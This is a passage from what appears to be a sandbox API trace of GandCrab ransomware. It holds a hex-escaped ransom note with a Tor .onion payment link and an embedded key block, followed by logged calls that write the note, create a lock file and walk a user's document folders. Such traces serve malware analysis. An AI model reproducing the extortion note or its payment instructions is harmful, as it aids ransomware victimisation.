x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0089.883] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0089.883] CloseHandle (hObject=0x2c4) returned 1 [0089.884] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.884] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.884] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0xc1)) [0089.884] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.884] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.884] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.884] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\d2ca4a09d2ca4deb61a.lock") returned 108 [0089.884] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0089.885] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.885] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\") returned 84 [0089.885] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\*" [0089.885] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503378 [0089.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.886] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0089.886] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.886] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0089.886] lstrcmpW (lpString1="-oOIqjsx.pptx", lpString2=".") returned 1 [0089.886] lstrcmpW (lpString1="-oOIqjsx.pptx", lpString2="..") returned 1 [0089.886] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="-oOIqjsx.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx") 